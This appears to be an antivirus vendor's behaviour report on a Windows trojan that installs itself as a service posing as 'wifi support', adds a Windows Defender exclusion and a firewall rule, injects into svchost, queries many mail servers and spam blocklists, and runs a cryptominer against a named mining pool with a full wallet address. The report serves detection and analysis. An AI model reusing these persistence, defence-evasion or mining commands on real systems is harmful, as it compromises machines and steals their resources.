Technical Information
To ensure autorun and distribution
Creates the following services
- [<HKLM>\System\CurrentControlSet\Services\firffoaz] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\firffoaz] 'ImagePath' = '%WINDIR%\SysWOW64\firffoaz\plddapoc.exe /d"<Full path to file>"'
- [<HKLM>\SYSTEM\CurrentControlSet\services\firffoaz] 'ImagePath' = '%WINDIR%\SysWOW64\firffoaz\plddapoc.exe'
Malicious functions
To complicate detection of its presence in the operating system,
adds antivirus exclusion with following registry keys:
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\SysWOW64\firffoaz' = '00000000'
Executes the following
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul
Injects code into
the following system processes:
- %WINDIR%\syswow64\svchost.exe
Modifies file system
Creates the following files
- %TEMP%\plddapoc.exe
- %WINDIR%\syswow64\config\systemprofile:.repos
Moves the following files
- from %TEMP%\plddapoc.exe to %WINDIR%\syswow64\firffoaz\plddapoc.exe
Deletes itself.
Network activity
TCP
HTTP GET requests
- http://www.google.com/
UDP
- DNS ASK mi##########m.mail.protection.outlook.com
- DNS ASK th###hold.ws
- DNS ASK ep###ames.com
- DNS ASK ma##.goodi.com
- DNS ASK go##i.com
- DNS ASK ma##.#ullcc.gov.uk
- DNS ASK hu###c.gov.uk
- DNS ASK aspmx.l.google.com
- DNS ASK al###i.unav.es
- DNS ASK al###os.uva.es
- DNS ASK mx##.#uc.rediris.es
- DNS ASK mo####r.arq.uva.es
- DNS ASK ma##.#ope-mail.com
- DNS ASK mx##.mb1p.com
- DNS ASK google.com
- DNS ASK alt1.aspmx.l.google.com
- DNS ASK th####oldstate.com
- DNS ASK eu#.###.#rotection.outlook.com
- DNS ASK ho##ail.it
- DNS ASK ALT2.ASPMX.L.GOOGLE.COM
- DNS ASK ar#.es
- DNS ASK ma##.#hresholds.net
- DNS ASK th###holds.net
- DNS ASK mx#.#use.net
- DNS ASK fu##.net
- DNS ASK ca###lcards.com
- DNS ASK ca###spain.es
- DNS ASK mx##########tral-1.prod.hydra.sophos.com
- DNS ASK ca##esur.es
- DNS ASK ge###tgroup.com
- DNS ASK in###gram.com
- DNS ASK cx#.##.#.cloudfilter.net
- DNS ASK co#.net
- DNS ASK ad#####mx402.alcoa.com
- DNS ASK al##a.com
- DNS ASK sm##.##cureserver.net
- DNS ASK as###nics.net
- DNS ASK ne##ol.com
- DNS ASK ti##way.ws
- DNS ASK mt#.inet.fi
- DNS ASK qu####et.inet.fi
- DNS ASK mx.###mexperts.com
- DNS ASK ar##ired.es
- DNS ASK mx.##paex.es
- DNS ASK de##ex.es
- DNS ASK ma##.aarkel.com
- DNS ASK aa##el.com
- DNS ASK sm##.#du.xunta.es
- DNS ASK ed#.#unta.es
- DNS ASK mx#.######deempresas.telefonica.es
- DNS ASK tp#.#nfomail.es
- DNS ASK mx.###zta.onet.pl
- DNS ASK on#t.eu
- DNS ASK mx.####iciodecorreo.es
- DNS ASK mx#.#omcast.net
- DNS ASK wa###ing.com
- DNS ASK co##ast.net
- DNS ASK th####nreuters.com
- DNS ASK de###bat.com
- DNS ASK ms#####p-mx2.hinet.net
- DNS ASK ms##.hinet.net
- DNS ASK th#####magazines.co.uk
- DNS ASK mx.###cali.co.uk
- DNS ASK ti###li.co.uk
- DNS ASK ma###.#mandes.com.ar
- DNS ASK sm###es.com.ar
- DNS ASK lc##z.com
- DNS ASK ho#########.olc.protection.outlook.com
- DNS ASK ho##ail.com
- DNS ASK ch##ter.net
- DNS ASK hk.####n.herominers.com
- DNS ASK mt##.##0.yahoodns.net
- DNS ASK 19#.###.##1.95.sbl-xbl.spamhaus.org
- DNS ASK ya##o.com
- DNS ASK 19#.###.#11.95.zen.spamhaus.org
- DNS ASK ff######x-vip1.prodigy.net
- DNS ASK be###outh.net
- DNS ASK 19#.###.#11.95.bl.spamcop.net
- DNS ASK mx####.##il.gm0.yahoodns.net
- DNS ASK 19#.###.#11.95.dnsbl.sorbs.net
- DNS ASK ao#.com
- DNS ASK 19#.###.211.95.in-addr.arpa
- DNS ASK 19#.###.#11.95.cbl.abuseat.org
- DNS ASK mx#.#harter.net
- DNS ASK li###delta.com
- DNS ASK li###gcare.com
- DNS ASK alt1.gmail-smtp-in.l.google.com
- DNS ASK gm##l.com
- DNS ASK sm######t.appliedexch.com
- DNS ASK ca#####geinsurance.net
- DNS ASK in###nline.net
- DNS ASK ea###link.net
- DNS ASK mx.####o.locaweb.com.br
- DNS ASK gl##o.com
- DNS ASK p.####om.ctmail.com
- DNS ASK ca###gen.com
- DNS ASK ho###sil.com
- DNS ASK ms#.#inet.net
- DNS ASK wi####ssliberty.net
- DNS ASK mx#.##rthlink.net
- DNS ASK sp##net.com
- DNS ASK mx######b2d01.pphosted.com
- DNS ASK us.#bm.com
- DNS ASK ms#####p-mx1.hinet.net
- DNS ASK sa####v.vdiweb.com
- DNS ASK e5.##.us.ibm.com
- DNS ASK ra###nal.com
- DNS ASK mx#######c01.gslb.pphosted.com
- DNS ASK ti###oint.com
- DNS ASK sm###.#ke.securence.com
- DNS ASK oa##t.com
- DNS ASK mx.####.thomsonreuters.com
- DNS ASK mx#####.yovocloud.com
Miscellaneous
Creates and executes the following
- '%WINDIR%\syswow64\firffoaz\plddapoc.exe' /d"<Full path to file>"
- '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\firffoaz\' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\plddapoc.exe" %WINDIR%\SysWOW64\firffoaz\' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' create firffoaz binPath= "%WINDIR%\SysWOW64\firffoaz\plddapoc.exe /d\"<Full path to file>\"" type= own start= auto DisplayName= "wifi support"' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' description firffoaz "wifi internet conection"' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' start firffoaz' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul' (with hidden window)
Executes the following
- '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\firffoaz\
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\plddapoc.exe" %WINDIR%\SysWOW64\firffoaz\
- '%WINDIR%\syswow64\sc.exe' create firffoaz binPath= "%WINDIR%\SysWOW64\firffoaz\plddapoc.exe /d\"<Full path to file>\"" type= own start= auto DisplayName= "wifi support"
- '%WINDIR%\syswow64\sc.exe' description firffoaz "wifi internet conection"
- '%WINDIR%\syswow64\sc.exe' start firffoaz
- '%WINDIR%\syswow64\svchost.exe'
- '%WINDIR%\syswow64\svchost.exe' --algo=cn-heavy/xhv -o hk.haven.herominers.com:10451 -u hvxyDpkRtcZaPBeYaKJ5t1XTwUT5K65EnENUmzZQc57Uhan6owyfqWTaQKAh5EQFUPFDaqbGsmVCdXapddCMPTYU6ZshRESV65.60000 -p 3 -k
